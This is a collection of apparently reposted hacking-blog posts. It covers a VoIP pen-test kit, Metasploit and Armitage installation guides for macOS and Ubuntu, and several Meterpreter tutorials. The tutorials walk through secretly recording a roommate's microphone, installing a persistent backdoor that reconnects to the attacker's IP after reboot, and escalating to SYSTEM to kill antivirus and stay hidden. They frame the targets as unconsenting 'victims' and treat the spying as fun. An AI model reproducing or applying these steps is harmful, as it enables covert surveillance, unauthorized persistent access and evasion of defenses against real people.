Exploit Creation Video’s

Exploit Creation

How to find vulnerabilities, write shellcode, exploit the vulnerability and finally turn it into a Metasploit exploit module! David Hoelzer is a Senior Fellow with the SANS Institute and author of the SANS Secure Coding in C/C++ course. TnX

VIPROY – VoIP Pen-Test Kit for Metasploit Framework

Viproy

Viproy Voip Pen-Test Kit provides penetration testing modules for VoIP networks. It supports signalling analysis for SIP and Skinny protocols, IP phone services and network infrastructure. Viproy 2.0 is released at Blackhat Arsenal USA 2014 with TCP/TLS support for SIP, vendor extentions support, Cisco CDP spoofer/sniffer, Cisco Skinny protocol analysers, VOSS exploits and network analysis modules. Furthermore, Viproy provides SIP and Skinny development libraries for custom fuzzing and analyse modules.

Current testing modules:

• SIP Register
• SIP Invite
• SIP Message
• SIP Negotiate
• SIP Options
• SIP Subscribe
• SIP Enumerate
• SIP Brute Force
• SIP Trust Hacking
• SIP UDP Amplification DoS

• SIP Proxy Bounce
• Skinny Register
• Skinny Call
• Skinny Call Forward
• VOSS Call Forwarder (September 2014)
• VOSS Speed Dial Manipulator (September 2014)
• MITM Proxy TCP
• MITM Proxy UDP
• Cisco CDP Spoofer

Software modules consist of options, register, invite, enumerator, brute force, trust analyzer and SIP proxy, you can set target networks and port numbers. Before carrying out any attack you should fingerprint and enumerate SIP services first, after that you should register with the server and start intercepting, making calls or create havoc at will.

Viproy VoIP penetration tests include targeting a local client address and port, discovering SIP services with valid credentials, setting username and password in Asterisk PBX, issuing direct invites and spoofing without credentials, enumerating all users, launching a denial of service to all valid users so that nobody can accept calls and brute forcing a target account or numeric range using a dictionary list to test users password strength.

Installation – Metasploit Github Edition

Copy “lib”, “modules” and “data” folders’ content to Metasploit Root “/” Directory.
Mixins.rb file (lib/msf/core/auxiliary/mixins.rb) should contain the following lines
require ‘msf/core/auxiliary/sip’
require ‘msf/core/auxiliary/skinny’

Viproy @ BlackHat USA 2014

More info can be found at: https://github.com/fozavci/viproy-voipkit

Installing Metasploit Framework on Mountain Lion and Mavericks

This Guide covers the installation of Metasploit Framework OSS Project on OSX Lion and Mountain Lion. Waiting for the symlink fix so as to update the script

This guide uses Homebrew as well as the script to provide the necessary packages to run Metasploit. If you have MacPorts this guide will not work and will cause problems. 

Dependencies

Make sure you run software update and install all updates for the operating system and install the latest version of Xcode so as to be able to compile software.

Installing Command Line Development Tools Xcode 4 on Mountain Lion

If you are running Xcode 4 you will need to go to Xcode Preference and choose the command line tools and download and install from the components

Installing Command Line Development Tools Xcode 5 on Mountain Lion

If you are running Xcode 5  you will need to go to Xcode Preference and choose the command line tools and download and install from the components

Installing Command Line Development Tools Xcode 5 on Mavericks

On OS X Mavericks the Command Line Developer Tools package can be installed on demand using “xcode-select –install” and the installed tools will be automatically updated using Software Update. Once you run the command the following dialog should appear and just click on Install

Java

Download the latest Java JDK 8 from Oracle. This should set all the proper shortcuts for the Java binaries http://www.oracle.com/technetwork/java/javase/downloads/index.html

Test that Java is properly installed by running

java -version

It should return the version of Java you just installed.  To check tha the location is /usr/bin/java for the link run:

whereis java

If both commands runs and the location is correct Java is properly installed on the system.

Manual Installation

Install Homebrew

/usr/bin/ruby -e "$(curl -fsSkL raw.github.com/mxcl/homebrew/go)"

We need to make sure that the binaries we install with homebrew are first in the path:

echo PATH=/usr/local/bin:/usr/local/sbin:$PATH >> ~/.bash_profile

source ~/.bash_profile

brew tap homebrew/versions

Install Nmap

For Nmap in the case of OSX I recommend the use of Homebrew since they are quite quick and keeping their formulas updated for the tool and work out most of the problems that may arise quite quickly. To install Nmap just run the command bellow:

brew install nmap

Install Ruby 2.1

On OS X we have 3 methods for installing ruby 2.1.x these are:

• Homebrew
• RVM (Ruby Version Manager)
• rbenv

Installing Ruby using Homebrew:

brew install homebrew/versions/ruby21

Check that yo are running the version of ruby you just installed with:

ruby -v

Installing Ruby using RVM:

curl -L https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bash_profile
source ~/.bash_profile
rvm install 2.1.5
rvm use 2.1.5 --default
ruby -v

Installing Ruby using rbenv:

cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile
echo 'eval "$(rbenv init -)"' >> ~/.bash_profile
source ~/.bash_profile

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bash_profile
source ~/.bash_profile
rbenv install 2.1.5
rbenv global 2.1.5
ruby -v

Once the packages have been install we need to install the required Ruby libraries that metasploit depends on:

sudo gem install bundler

Install PostgreSQL

brew install postgresql --without-ossp-uuid

Configure PostgreSQL

Init the Database if this is a first time install:

initdb /usr/local/var/postgres

Configure Postgres to automatically load on login, the instruction bellow are as an example copy and paste the commands that the brew installer showed and follow any other instruction it shows :

mkdir -p ~/Library/LaunchAgents
cp /usr/local/Cellar/postgresql/9.1.4/homebrew.mxcl.postgresql.plist ~/Library/LaunchAgents/
launchctl load -w ~/Library/LaunchAgents/homebrew.mxcl.postgresql.plist

PostgreSQL will now start every time a user logs in. Create user called msf for use in Metasploit:

createuser msf -P -h localhost

Create database for use with metasploit called msf and make the user msf the owner:

createdb -O msf msf -h localhost

Record the password used for the account created since it will be used when configuring the framework.

Installing Metasploit Framework

For regular use of the framework only needs to clone the Git repository and create the necessary links and set the variable for the database config file

Create Symlink Copy for Regular Use

WARNING: Currently there is a bug in Metasploit Framework with Symlinks: https://github.com/rapid7/metasploit-framework/issues/4602

cd /usr/local/share/

git clone https://github.com/rapid7/metasploit-framework.git

cd metasploit-framework

for MSF in $(ls msf*); do ln -s /usr/local/share/metasploit-framework/$MSF /usr/local/bin/$MSF;done

sudo chmod go+w /etc/profile

sudo echo export MSF_DATABASE_CONFIG=/usr/local/share/metasploit-framework/config/database.yml >> /etc/profile

From the Metasploit-Framework folder lets use the Bundler Gem to install the properly supportted Gem versions:

bundle install

Before starting to use the framework we need to create the database config file and set the parameters:

vim /usr/local/share/metasploit-framework/config/database.yml

Enter the following text in to the file keeping the spacing and using the values used for creating the user and database:

production:
 adapter: postgresql
 database: msf
 username: msf
 password: 
 host: 127.0.0.1
 port: 5432
 pool: 75
 timeout: 5

To load the variable for the database configuration file for the current user:

source /etc/profile
source ~/.bash_profile

Execute Metasploit msfconsole for the first time so it initializes the schema for the database for the first time as your current user and not as root:

msfconsole

Metasploit for Development and Contribution

If you wish to develop and contribute to the product you can follow the additional steps here Metasploit Dev Environment . For this you will need a GitHub account and you will fork the project in to your own account. I personally keep my dev copy of Metasploit in ~/Development folder and after an initial run of msfconsole I keep my database.yml file in ~/.msf4/cofig folder and adjust the MSF_DATABASE_CONFIG variable for it or run msfconsole with the -y option and point it to a YAML file with the correct configuration.

Install Armitage

Since armitage is no longer included with Framework we need to execute some additional steps:

brew install pidof
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage-latest.tgz
tar -xvzf /tmp/armitage.tgz -C /usr/local/share


 bash  -c "echo  \'/usr/bin/java\'  -jar /usr/local/share/armitage/armitage.jar \$\*" > /usr/local/share/armitage/armitage

perl -pi -e 's/armitage.jar/\/usr\/local\/share\/armitage\/armitage.jar/g' /usr/local/share/armitage/teamserver

Link Scripts

ln -s /usr/local/share/armitage/armitage /usr/local/bin/armitage

ln -s /usr/local/armitage/teamserver /usr/local/bin/teamserver

One important thing to take into consideration, for using Armitage and many of the modules provided in Metasploit you need to run them as root. Do to the way variables are handled when using the sudo command to invoke msfconsole or Armitage you need to give it the -E option:

# For launching Armitage
sudo -E armitage

# For launching msfconsole
sudo -E msfconsole

Installing Metasploit Framework on Ubuntu 14.04 LTS and Debian 7

This Guide covers the installation of Metasploit Framework OSS Project on Ubuntun Linux LTS. If you do not wish to run the Open Source version or set up a development environment and do not mind giving your email address to Rapid 7 for marketing I would recommend downloading their comercial installer from http://www.metasploit.com/ Installing DependencieWe start by making sure that we have the latest packages by updating the system using apt-get:

sudo apt-get update
sudo apt-get upgrade

Now that we know that we are running an updated system we can install all the dependent packages that are needed by Metasploit Framework:

sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev

Installing a Proper Version of Ruby

The distribution sadly does not comes by default with a proper version of Linux for us to use with Metasploit Framework and we will have to download and compile a proper one. There 2 mains ways recommended for this are using RVM or rbenv (Do not install both choose one or the other).

Installing Ruby using RVM:

curl -L https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.5
rvm use 2.1.5 --default
ruby -v

Installing Ruby using rbenv:

cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
exec $SHELL

rbenv install 2.1.5
rbenv global 2.1.5
ruby -v

Once the packages have been install we need to install the required Ruby libraries that metasploit depends on:

sudo gem install bundler 

Installing Nmap

One of the external tools that Metasploit uses for scanning that is not included with the sources is Nmap. Here we will cover downloading the latest source code for Nmap, compiling and installing:

mkdir ~/Development
cd ~/Development
svn co https://svn.nmap.org/nmap
cd nmap
./configure
make
sudo make install
make clean

Configuring Postgre SQL Server

We start by switching to the postgres user so we can create the user and database that we will use for Metasploit

sudo -s
su postgres

Now we create the user and Database, do record the database that you gave to the user since it will be used in the database.yml file that Metasploit and Armitage use to connect to the database.

createuser msf -P -S -R -D
createdb -O msf msf
exit
exit

If you experience problems with the database setup this fedora guide offers a good guide for troubleshooting and setup https://fedoraproject.org/wiki/Metasploit_Postgres_Setup

Installing Metasploit Framework

We will download the latest version of Metasploit Framework via Git so we can use msfupdate to keep it updated:

cd /opt
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework

Install using bundler the requiered gems and versions:

cd metasploit-framework 
bundle install

WARNING: Currently there is a bug in Metasploit Framework with Symlinks: https://github.com/rapid7/metasploit-framework/issues/4602

Lets create the links to the commands so we can use them under any user and not being under the framework folder, for this we need to be in the metasploit-framework folder if not already in it:

cd metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

Metasploit for Development and Contribution

If you wish to develop and contribute to the product you can follow the additional steps here Metasploit Dev Environment . For this you will need a GitHub account and you will fork the project in to your own account. I personally keep my dev copy of Metasploit in ~/Development folder and after an initial run of msfconsole I keep my database.yml file in ~/.msf4/cofig folder and adjust the MSF_DATABASE_CONFIG variable for it or run msfconsole with the -y option and point it to a YAML file with the correct configuration.

Installing armitage:

curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage-latest.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver

Lets create the database.yml file that will contain the configuration parameters that will be use by framework:

sudo nano /opt/metasploit-framework/config/database.yml

Copy the YAML entries and make sure you provide the password you entered in the user creating step in the password field for the database:

production:
 adapter: postgresql
 database: msf
 username: msf
 password: 
 host: 127.0.0.1
 port: 5432
 pool: 75
 timeout: 5

Create and environment variable so it is loaded by Armitage and by msfconsole when running and load the variable in to your current shell:

sudo sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"

source /etc/profile

First Run

Now we are ready to run Metasploit for the first time. My recommendation is to run it first under a regular user so the folders create under your home directory have the proper permissions. First time it runs it will create the entries needed by Metasploit in the database so it will take a while to load.

msfconsole

How to Remotely Record & Listen to the Microphone on Anyone’s Computer

So many of you responded positively to my post about using the keylogger, as well as my post regarding turning on the webcam, that I decided that you might enjoy another similar hack. In this article, we will enable the audio recording capability on the remote system of your roommate.

Once again, let’s fire up Metasploit from BackTrack and embed the Meterpreter on the remote or victim system. There are a number of ways of doing this, so check back to my earlier posts to see how to install it via amalicious clickable link, a malicious Microsoft Office document or Adobe Acrobat file, and more.

How to Record Computer Audio Remotely

From here, we should have a Meterpreter prompt on our system that reflects the control panel of the Meterpreter on the remote victim system.

Here we have almost total control of their system. We can turn off their antivirus system, embed a software keylogger, turn on their webcam, etc. In this case, we will use a script that turns on the sound recording on our roommate’s computer system and enables us to play back this recording at a later time.

Step 1: Find the sound__recorder.rb Script

As this script is relatively new (2010), let’s make certain that your version of Metasploit has the sound recorder script. First, open a second terminal and navigate to the following directory.

root@bt > cd /opt/metasploit/msf3/scripts/meterpreter

Once we are in this directory, simply do a listing of all files by typing:

root@bt: /opt/metasploit/msf3/scripts/meterpreter ls -l

The script should appear among the list of meterpreter scripts. If it doesn’t, you can either update your Metasploit by typing in the msfconsole:

msf > msfupdate

Or you can download the script here.

Make sure that you save it to the directory/opt/metasploit/msf3/scripts/meterpreter.

Step 2: Run sound__recorder

Now that we have the script in the proper directory, let’s run it. First, let’s look at the help file by typing:

meterpreter > run sound_recorder -h

Notice that we have just a couple options. We can specify the number of 30 second intervals to record with the –i switch and the directory to save the recorded file to with the –l switch. So, let’s record 15 minutes (30 x 30 seconds = 15 minutes) of our roommate and save the file in the /etcdirectory. We can do this by typing:

meterpreter > run sound_recorder -i 30 -l /etc

Step 3: Play Back the Recording

When the recording has completed and run its course, the Meterpreter will save the recording to a file on our system in the directory we specified, or in this case the /etc directory.

Now we simply need to run that audio file in an audio player and we can hear everything that was going on in our roommate’s room during that 15 minutes.

This could be fun! Who knows what might be on that 15 minutes of recording every Saturday night!

How to Remotely Install an Auto-Reconnecting Persistent Back Door on Someone’s PC

Most of my recent posts have addressed using Metasploit’s Meterpreter and what we can do once we have embedded it on the victim’s system. This includes remotely installing a keylogger, enabling the webcam, enabling the microphone and recording, disabling the antivirus software, among many other things. The list is almost unlimited.

Unfortunately, the Meterpreter ceases to work if the victim system is rebooted. As a result, many of you have written me asking whether we can maintain or persist the Meterpreter on the victim system.

The answer is an unequivocal “Yes!”

We can embed the Meterpreter and then come back later—even after the victim’s computer has been rebooted—and reconnect to our little backdoor or listener. I’m dedicating this post to showing you how to do this.

Getting Started

Let’s assume that you have been successful in embedding the Meterpreter on the victim’s system, and that you have a screen that looks like the screenshot below. If you’re not sure how to do this, check out some of my previous posts for help.

Now, let’s get started.

Step 1: Run the Persistence Script

Metasploit has a script named persistence that can enable us to set up a persistent Meterpreter (listener) on the victim’s system. First let’s take a look at the options that are available when we run this scrip by using the –h switch.

At the Meterpreter prompt, type the following:

meterpreter > run persistence -h

We can see in the screenshot above that…

–A switch starts a matching handler to connect to the agent.
-With the -L switch we tell the system where to place the Meterpreter on the target system.
-The –P switch tells the system what payload to use (Windows/Meterpreter/reverse_tcp is the default, so we won’t use this switch).
-S starts the agent on boot with system privileges.
-The -U switch starts the agent when the user (U) logs on.
-The -x switch starts the agent when the system boots.
-With the –i switch we can indicate the time interval between each connection attempt.
-The -p switch indicates the port, and finally…
-The –r switch indicates the IP address of our ( r ) system running Metasploit.

Here we will use the –A, -L, -x, -i, -p, and –r switches.

Type at the Meterpreter prompt:

meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113

This command then will run the persistence script that will start a matching handler (-A), place the Meterpreter at c:\\ on the target system (-L c:\\), starts the listener when the system boots (-x), checks every 30 seconds for a connection (-i 30), connects on port 443 (-p 443), and connects to the local system (ours) on IP address 192.168.1.113.

When we run this command, this is what we should see.

Step 2: Opening a Second Session

We can see that we have opened a Meterpreter session on the victim system.

We return to our Metasploit prompt, by typing:

meterpreter > background

This will return us to the msf prompt, where can now type:

msf exploit(ms08_067_netapi) > sessions –i

We see above that now we have two or more sessions running on the victim system (I actually have three sessions running on this victim) as the persistent Meterpreter has opened a second session on the system.

Step 3: Testing

This is all very nice, but the key here is whether the Meterpreter will reconnect to our system even after the target system reboots. We can test this by typing;

meterpreter > reboot

This will reboot the target/victim machine and if we are successful, the Meterpreter will reconnect to our system.

Even after the system reboots, the Meterpreter on the victim system attempts to connect to us every 30 seconds until it has successfully open a session for us.

Now we have successfully opened a persistent connection on the victim system that we can come back to time and time again to wreak havoc!

How to Kill and Disable Antivirus Software on a Remote PC

In some of my past articles, I’ve shown numerous ways of embedding a listener/rootkit on a remote system, including buffer overflows of the operating system, getting the victim to click on a link to our malicious website, and sending a malicious Microsoft Office and Adobe Acrobat file.

In each case, we’ve embedded a listener/rootkit that gives us control over the system. Metasploit has a powerful listener called Meterpreter that enables us to control the system, send more commands, pivot from the victim to other systems, elevate our privileges, and many other things, as we will see.

My next few posts will focus on how to use the Meterpreter in various powerful ways. Today, we will focus on how to use the Meterpreter to disable the antivirus protection on our victim system, which is more advanced than simply bypassing the antivirus program, as I wrote about last time.

Disabling is necessary because the next time the system is scanned by the victim’s antivirus software, it’s likely to detect our listener and disable it, so we need to take preemptive action to disable it before it can disable us.

So…fire up Metasploit and let’s get hacking!

Step 1: Getting Started

I’m assuming you have already embedded your Meterpreter listener by one of the many methods I’ve outlined in my earlier posts, and that you have a Meterpreter prompt as it appears in the screenshot below.

Before we can begin to kill the AV software, we need to escalate our privileges.

Usually, when we embed a listener on the victim’s system, the listener will only have the privileges of the user who provided us with a gateway to their system by clicking on the malicious website, Office doc, Abobe PDF, etc.

That user most often has limited rights or privileges to the system. Unlimited rights to do anything on the system is held by the administrator or system administrator (or sysadmin for short).

We need to escalate our privileges from the user to sysadmin to have our way with this computer.

Step 2: Checking the User

Before we start the process of escalation, let’s check what user we are logged in as. Type:

meterpreter > getuid

This will return the ID of the user we are logged in as. If we are anything but the sysadmin, we’ll need to escalate to kill the antivirus software.

Step 3: Escalate Privileges

Metasploit and its Meterpreter make it simple to escalate privileges to the sysadmin. Simply type getsystem at the Meterpreter prompt.

meterpreter > getsystem

Notice that Metasploit responds with “…got system (with technique 1)“. Metasploit has multiple methods to escalate privileges and it tries each of them out until one works.

In our case, it was successful with technique 1.

Step 4: Check That We Are Sysadmin

Now that Metasploit has told us that it has escalated our privileges to sysadmin, let’s make sure. Type:

meterpreter > getuid

As you can see in my screenshot above, the victim responds with NT AUTHORITY\SYSTEM, the syadmin user!

Congratulations! You can now have your way this victim.

Step 5: Kill the AntiVirus Software

Now that we have unlimited rights to this system, let’s kill the antivirus software. Metasploit has a Ruby script called killav.rb. We simply run that script from the Meterpreter prompt and it will kill the system’s antivirus software.

Make certain to start the script with the keyword run. Type:

meterpreter > run killav.rb

Notice from the screenshot above that the killav.rb script not only killed the antivirus process, but also the open command prompt.

Now that we have killed the antivirus process, we can remain hidden within their system and do as we please with little or no chance of being detected.

In upcoming blogs, we will explore more adventures with the power of our embedded listener/rootkit with sysadmin privileges. There is no limit what we can do now!

JAW: Java Applet Wizard, that makes you go java Meterpreter by payload

JAW: Java Applet Wizard
JAW is written in Python and comes in 2 flavors.

Flavor 1: Java applet maker using a meterpreter executable.
To do client-side attacks using evil java applets:
http://exploit.co.il/hacking/client-side-attack-using-evil-java-applets

Flavor 2: Java applet maker using a java meterpreter – full java attack script
By using Metasploit java meterpreter payload:
http://exploit.co.il/hacking/metasploit-java-meterpreter-payload